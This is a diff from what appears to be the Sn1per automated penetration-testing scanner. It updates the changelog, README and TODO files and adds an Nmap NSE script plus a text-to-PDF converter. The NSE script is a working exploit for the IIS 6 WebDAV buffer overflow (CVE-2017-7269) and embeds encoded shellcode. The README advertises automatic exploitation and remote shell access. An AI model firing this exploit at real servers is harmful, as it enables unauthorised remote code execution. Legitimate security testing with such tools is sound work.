Sn1per by 1N3@CrowdShield

Fix install.sh: add missing packages

CHANGELOG.md

@@ -1,4 +1,100 @@
 ## CHANGELOG:
+* v4.4 - Fixed issue with sniper nuke and airstrike modes not running.
+* v4.4 - Added improved SNMP checks via NMap/Metasploit.
+* v4.4 - Resolved dependency issue for nfs-common package.
+* v4.4 - Fixed bug in sniper -fp command switch.
+* v4.3 - Fixed bug in version info.
+* v4.2 - Fixed bad merge in 4.1 causing sniper to break.
+* v4.1 - Fixed a few bugs with various command line switches for airstrike and nuke modes.
+* v4.1 - Fixed issue with path relative file inclusion via the -f flag. You can now include just the local filename (sniper -f targets.txt).
+* v4.0 - Added new command switch options for all sniper scans (see --help for details)
+* v4.0 - Added HTML formatted report for all workspaces to display screenshots, headers, reports and open ports
+* v4.0 - Added optional scan options such as --recon, --osint, --fullportonly --bruteforce, etc. to selectively enable scan modules. (see --help for details) 
+* v4.0 - Improved Yasou scan options to include existing NMap XML files
+* v4.0 - Added automatic HTML/TXT/PDF reporting for all scans by default
+* v4.0 - Updated default workspace directory to store all loot files by $TARGET name or $WORKSPACE alias
+* v4.0 - Added screenshot and header retrieval to loot storage
+* v4.0 - Updated NMAP SMB enum script
+* v3.0 - Improved performance of various sniper modes
+* v3.0 - Added Aquatone domain flyover tool
+* v3.0 - Added slurp S3 public AWS scanner
+* v3.0 - Updated Sub-domain hijacking site list
+* v3.0 - Changed look and feel of console output to help readability
+* v3.0 - Added online/offline check to implement changes to scans when in online vs. offline mode
+* v2.9 - New improved fullportonly scan mode
+* v2.9 - Added online check to see if there's an active internet connection
+* v2.9 - Changed default browser to firefox to clear up errors in loot commmand
+* v2.9 - Created uninstall.sh script to uninstall sniper
+* v2.9 - Removed automatic workspace creation per scan
+* v2.9 - Added curl timeout in update command to fix lag
+* v2.9 - Fixed minor NMap UDP scan flag issue
+* v2.9 - Added Metagoofil
+* v2.9 - Updated theharvester scan options to include more results
+* v2.8 - Improved discovery mode scan performance and output
+* v2.8 - Improved fullportonly scan performance
+* v2.8 - Improved startup performance options
+* v2.8 - Added Cansina web/file brute force tool
+* v2.8 - Added webporthttp and webporthttps modes
+* v2.8 - Added custerd software enumeration tool
+* v2.7 - Fixed issue with sniper update command and install.sh not running
+* v2.7 - Fixed errors with GooHak
+* v2.7 - Fixed syntax errors in sniper conditional statements 
+* v2.7 - Added CloudFail 
+* v2.7 - Fixed issue with [: ==: unary operator expected errors
+* v2.6 - Added Blackarch Linux support 
+* v2.6 - Added $BROWSER variable to set default browser
+* v2.5g - Updated README with update command
+* v2.5f - Fixes for various bugs reported and fixed by @ifly53e (https://github.com/1N3/Sn1per/pull/89)
+* v2.5e - Fixed issue with port 3128/tcp checks (CC. @ifly53e)
+* v2.5d - Added searchsploit option for (-v) to search all terms (CC. @ifly53e)
+* v2.5c - Added various improvements to 'discover' mode scans
+* v2.5b - Removed NMap script checks for 'fullportonly' mode
+* v2.5a - Added auto-updates to check and download new versions
+* v2.5a - Fixed issue with install.sh to resolve pip aha error
+* v2.5a - Added libxml2-utils to install.sh to meet dependencies
+* v2.5 - Added HTML report generation via sniper 'loot' command
+* v2.5 - Added automatic NMap searchsploit integration to find exploits
+* v2.5 - Added various improvements to Sn1per discovery scan mode
+* v2.5 - Fixed issue with IIS BoF NMap script (CC. ifly53e)
+* v2.4f - Fixed issue with upper NMap port range(CC. DaveW)
+* v2.4e - Added NMap no ping switch to all scans
+* v2.4d - Fixed issue with rpcinfo install script
+* v2.4d - Fixed issue with Arachni install script
+* v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)
+* v2.4b - Fixed issue with discovery scan output file (CC. @ifly53e)
+* v2.4b - Fixed issue with Intel AMT RCE port list
+* v2.4a - Added all NMap script checks via 'fullportonly' mode
+* v2.4a - Added JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Metasploit exploit
+* v2.4a - Added Java RMI RCE NMap/Metasploit detection
+* v2.4a - Added INTEL-SA-00075 (Intel AMT) vulnerability NMap script
+* v2.4 - Added detection for open X11 servers
+* v2.4 - Added IIS6 Win2k3 RCE NMap script
+* v2.4 - Added option to disable Google Hacking queries via Firefox
+* v2.3d - Fixed issue with loot command
+* v2.3c - Added Apache Struts 2 RCE NMap script
+* v2.3c - Added Apache Struts 2 RCE NMap exploit
+* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
+* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
+* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
+* v2.2f - Added various optimizations and minor code fixes
+* v2.2e - Changed NMap scan options (removed -P0 flag)
+* v2.2d - Added MongoDB checks
+* v2.2d - Improved NMap scanning options
+* v2.2c - Added CouchDB checks
+* v2.2c - Updated Sub-domain takeover list
+* v2.2b - Added fullportonly mode to do exclusive full port scans
+* v2.2b - Fixed minor issue with Metasploit Pro not starting
+* v2.2b - Fixed minor issue with sniper loot command
+* v2.2a - Fixed minor issue with loot function
+* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
+* v2.2 - Added Sn1per workspaces to loot directory
+* v2.1d - Added crt.sh sub-domain check
+* v2.1d - Removed blank screenshots from loot directory
+* v2.1c - Fixed issue with install.sh install directories
+* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
+* v2.1b - Removed Zenmap
+* v2.1a - Separated Arachni reports for port 80/443/tcp
+* v2.1a - Fixed NMap full port scan options
 * v2.1 - Added Arachni with auto HTML web reporting (web mode only)
 * v2.1 - Added full NMap detailed port scans
 * v2.1 - Added port 4443/tcp checks
@@ -113,6 +209,3 @@
 * v1.4 - Added Breach-Miner for detection of breached accounts
 * v1.4 - Fixed minor errors with nmap
 * v1.4 - Removed debug output from goohak from displaying on console
-
-## FUTURE:
-* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)

LICENSE.md

@@ -0,0 +1,2 @@
+## LICENSE:
+This software is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial use.

README.md

@@ -1,24 +1,35 @@
-![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.jpg)
+![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per.jpg)
 
 ## ABOUT:
 Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. 
 
 ## DEMO VIDEO:
-[![Sn1per Demo](https://img.youtube.com/vi/nA_V_u3QZA4/0.jpg)](https://www.youtube.com/watch?v=nA_V_u3QZA4)
+[![Demo](https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm.png)](https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm)
 
 ## FEATURES:
-* Automatically collects basic recon (ie. whois, ping, DNS, etc.)
-* Automatically launches Google hacking queries against a target domain
-* Automatically enumerates open ports
-* Automatically brute forces sub-domains and DNS info
-* Automatically checks for sub-domain hijacking
-* Automatically runs targeted NMap scripts against open ports
-* Automatically runs targeted Metasploit scan and exploit modules
-* Automatically scans all web applications for common vulnerabilities
-* Automatically brute forces all open services
-* Automatically exploit remote hosts to gain remote shell access
-* Performs high level enumeration of multiple hosts
-* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
+- [x] Automatically collects basic recon (ie. whois, ping, DNS, etc.)
+- [x] Automatically launches Google hacking queries against a target domain
+- [x] Automatically enumerates open ports via NMap port scanning
+- [x] Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
+- [x] Automatically checks for sub-domain hijacking
+- [x] Automatically runs targeted NMap scripts against open ports
+- [x] Automatically runs targeted Metasploit scan and exploit modules
+- [x] Automatically scans all web applications for common vulnerabilities
+- [x] Automatically brute forces ALL open services
+- [x] Automatically test for anonymous FTP access
+- [x] Automatically runs WPScan, Arachni and Nikto for all web services
+- [x] Automatically enumerates NFS shares
+- [x] Automatically test for anonymous LDAP access
+- [x] Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
+- [x] Automatically enumerate SNMP community strings, services and users
+- [x] Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
+- [x] Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
+- [x] Automatically tests for open X11 servers
+- [x] Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
+- [x] Performs high level enumeration of multiple hosts and subnets
+- [x] Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
+- [x] Automatically gathers screenshots of all web sites
+- [x] Create individual workspaces to store all scan output
 
 ## KALI LINUX INSTALL:
 ```
@@ -27,6 +38,8 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
 
 ## DOCKER INSTALL:
 
+Credits: @menzow
+
 Docker Install:
 https://github.com/menzow/sn1per-docker
 
@@ -41,28 +54,82 @@ $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io
 
 ## USAGE:
 ```
-sniper <target> <report>
-sniper <target> stealth <report>
-sniper <CIDR> discover
-sniper <target> port <portnum> 
-sniper <target> web <report>
-sniper <target> nobrute <report>
-sniper <targets.txt> airstrike <report>
-sniper <targets.txt> nuke <report>
-sniper loot
+[*] NORMAL MODE
+sniper -t|--target <TARGET>
+
+[*] NORMAL MODE + OSINT + RECON
+sniper -t|--target <TARGET> -o|--osint -re|--recon
+
+[*] STEALTH MODE + OSINT + RECON
+sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon
+
+[*] DISCOVER MODE
+sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>
+
+[*] SCAN ONLY SPECIFIC PORT
+sniper -t|--target <TARGET> -m port -p|--port <portnum>
+
+[*] FULLPORTONLY SCAN MODE
+sniper -t|--target <TARGET> -fp|--fullportonly
+
+[*] PORT SCAN MODE
+sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>
+
+[*] WEB MODE - PORT 80 + 443 ONLY!
+sniper -t|--target <TARGET> -m|--mode web
+
+[*] HTTP WEB PORT MODE
+sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>
+
+[*] HTTPS WEB PORT MODE
+sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>
+
+[*] ENABLE BRUTEFORCE
+sniper -t|--target <TARGET> -b|--bruteforce
+
+[*] AIRSTRIKE MODE
+sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike
+
+[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
+sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>
+
+[*] ENABLE LOOT IMPORTING INTO METASPLOIT
+sniper -t|--target <TARGET>
+
+[*] LOOT REIMPORT FUNCTION
+sniper -w <WORKSPACE_ALIAS> --reimport
+
+[*] UPDATE SNIPER
+sniper -u|--update
 ```
 
 ### MODES:
-* **REPORT:** Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
-* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
+* **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
+* **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
+* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
+* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
 * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
 * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
+* **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.
 * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.   
-* **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
-* **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
-* **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
-* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type 'sniper loot'.
+* **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.
+* **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.
+* **UPDATE:** Checks for updates and upgrades all components used by sniper.
+* **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.
 
 ## SAMPLE REPORT:
 https://gist.github.com/1N3/8214ec2da2c91691bcbc
 
+## LICENSE:
+This software is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial use.
+
+## LOGO:
+Credit to Sponge Nutter for the original sniper penguin logo.
+
+## DONATIONS:
+Donations are welcome. This will help fascilitate improved features, frequent updates and better overall support for sniper.
+- [x] BTC 1Fav36btfmdrYpCAR65XjKHhxuJJwFyKum
+- [x] ETH 0x20bB09273702eaBDFbEE9809473Fd04b969a794d
+- [x] LTC LQ6mPewec3xeLBYMdRP4yzeta6b9urqs2f
+- [x] XMR 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbS3EN24xprAQ1Z5Sy5s
+- [x] ZCASH t1fsizsk2cqqJAjRoUmXJSyoVa9utYucXt7

TODO.md

@@ -1,3 +1,8 @@
 ###TODO:
-
-* Add automatic reporting for all scans by default
+* Add checks to make sure all commands exist at startup. If not, refer to installer. 
+* Create a sniper-kali release to only use base Kali image toolsets
+* Check if there's an active internet connection, if not, run offline mode
+* Add proxy support for all scans
+* Look into adding gobuster
+* Update subdomain list with aquatone list
+* Increase thread count for file/dir brute force

bin/iis-buffer-overflow.nse

@@ -0,0 +1,181 @@
+local nmap = require "nmap"
+local string = require "string"
+local shortport = require "shortport"
+local vulns = require "vulns"
+
+-- NSE Buffer Overflow vulnerability in IIS
+
+---
+-- @usage
+-- ./nmap iis-buffer-overflow <target>
+--
+-- @output
+-- PORT   STATE  SERVICE
+-- 80/tcp open   http
+-- |  iis-buffer-overflow:
+-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
+-- |       State: LIKELY_VULNERABLE
+-- |       Risk factor: High CVSS: 10.0
+-- |       Description:
+-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
+-- |         service in Internet Information Services (IIS) 6.0
+-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
+-- |         arbitrary code via a long header beginning with "If: <http://" in a
+-- |         PROPFIND request, as exploited in the wild in July or August 2016.
+-- |
+-- |         Original exploit by Zhiniang Peng and Chen Wu.
+-- |
+-- |    References:
+-- |     https://github.com/edwardz246003/IIS_exploit,
+-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
+--
+
+author = {
+  "Zhiniang Peng", -- Original author
+  "Chen Wu",       -- Original author
+  "Rewanth Cool"   -- NSE script author
+}
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit", "vuln", "intrusive"}
+
+portrule = shortport.portnumber(80, "tcp")
+
+action = function(host, port)
+  local socket, response, try, catch, payload, shellcode, vulnerable_name
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
+    state = vulns.STATE.NOT_VULN,
+    risk_factor = "High",
+    description = [[
+Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
+in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
+with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
+
+Original exploit by Zhiniang Peng and Chen Wu.
+    ]],
+    IDS = {
+      CVE = 'CVE-2017-7269'
+    },
+    scores = {
+      CVSS = '10.0'
+    },
+    references = {
+      'https://github.com/edwardz246003/IIS_exploit',
+      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
+    },
+    dates = {
+      disclosure = {year = '2017', month = '03', day = '26'},
+    }
+  }
+
+  -- If domain name doesn't exist this line of code takes ip into consideration
+  vulnerable_name = host.targetname or host.ip
+
+  socket = nmap.new_socket()
+  catch = function()
+    socket:close()
+  end
+
+  try = nmap.new_try(catch)
+  try(socket:connect(host, port))
+
+  -- Crafting the payload by parts
+
+  -- Crafting the request with HTTP PROPFIND method
+  payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
+  payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
+
+  -- Random text added to payload (Can be modified only for experimental purposes)
+  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
+  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
+  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
+  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
+  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
+  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
+  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
+  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
+  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
+  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
+  payload = payload .. '\xb3\xe3\x95\xb7'
+
+  -- Main payload (Do not edit this part)
+  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
+  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
+  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
+  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
+  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
+  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
+  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
+
+  payload = payload .. '>'
+  payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
+
+  -- Random text added to payload (Can be modified only for experimental purposes)
+  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
+  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
+  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
+  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
+  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
+  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
+  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
+  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
+  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
+  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
+
+  -- Main payload (Do not edit this part)
+  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
+  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
+  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
+  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
+  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
+  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
+  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
+  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
+  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
+  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
+  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
+
+  -- Shellcode
+  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
+  shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
+  shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
+  shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
+  shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
+  shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
+
+  payload = payload .. shellcode
+  payload = payload .. '>\r\n\r\n'
+
+  -- Exploiting the vulnerability
+  try(socket:send(payload))
+
+  -- We receive a 200 response if the payload succeeds.
+  response = try(socket:receive_bytes(80960))
+  socket:close()
+
+  -- Checking for 200 response in the response
+  local regex = "HTTP/1.1 (%d+)"
+  local status = string.match(response, regex)
+
+  if status == '200' then
+    -- Buffer overflow is successfully executed on the server.
+    vuln.state = vulns.STATE.EXPLOIT
+    vuln.exploit_results = response
+  elseif status == '400' then
+    -- Bad request error is occured because webdav is not installed.
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.exploit_results = "Server returned 400: Install webdav and try again."
+  elseif status == '502' then
+    -- Likely to have an error in the Server Name
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
+  elseif status ~= nil then
+    vuln.exploit_results = response
+  end
+
+  return vuln_report:make_output(vuln)
+
+end
+

bin/pyText2pdf.py

@@ -0,0 +1,601 @@
+#! /usr/bin/env python
+"""
+ pyText2Pdf - Python script to convert plain text files into Adobe
+ Acrobat PDF files with support for arbitrary page breaks etc.
+
+ Version 2.0
+
+ Author: Anand B Pillai <abpillai at gmail dot com>
+    
+"""
+
+# Derived from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/189858
+
+import sys, os
+import string
+import time
+import optparse
+import re
+
+LF_EXTRA=0
+LINE_END='\015'
+# form feed character (^L)
+FF=chr(12)
+
+ENCODING_STR = """\
+/Encoding <<
+/Differences [ 0 /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /space /exclam
+/quotedbl /numbersign /dollar /percent /ampersand
+/quoteright /parenleft /parenright /asterisk /plus /comma
+/hyphen /period /slash /zero /one /two /three /four /five
+/six /seven /eight /nine /colon /semicolon /less /equal
+/greater /question /at /A /B /C /D /E /F /G /H /I /J /K /L
+/M /N /O /P /Q /R /S /T /U /V /W /X /Y /Z /bracketleft
+/backslash /bracketright /asciicircum /underscore
+/quoteleft /a /b /c /d /e /f /g /h /i /j /k /l /m /n /o /p
+/q /r /s /t /u /v /w /x /y /z /braceleft /bar /braceright
+/asciitilde /.notdef /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
+/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
+/dotlessi /grave /acute /circumflex /tilde /macron /breve
+/dotaccent /dieresis /.notdef /ring /cedilla /.notdef
+/hungarumlaut /ogonek /caron /space /exclamdown /cent
+/sterling /currency /yen /brokenbar /section /dieresis
+/copyright /ordfeminine /guillemotleft /logicalnot /hyphen
+/registered /macron /degree /plusminus /twosuperior
+/threesuperior /acute /mu /paragraph /periodcentered
+/cedilla /onesuperior /ordmasculine /guillemotright
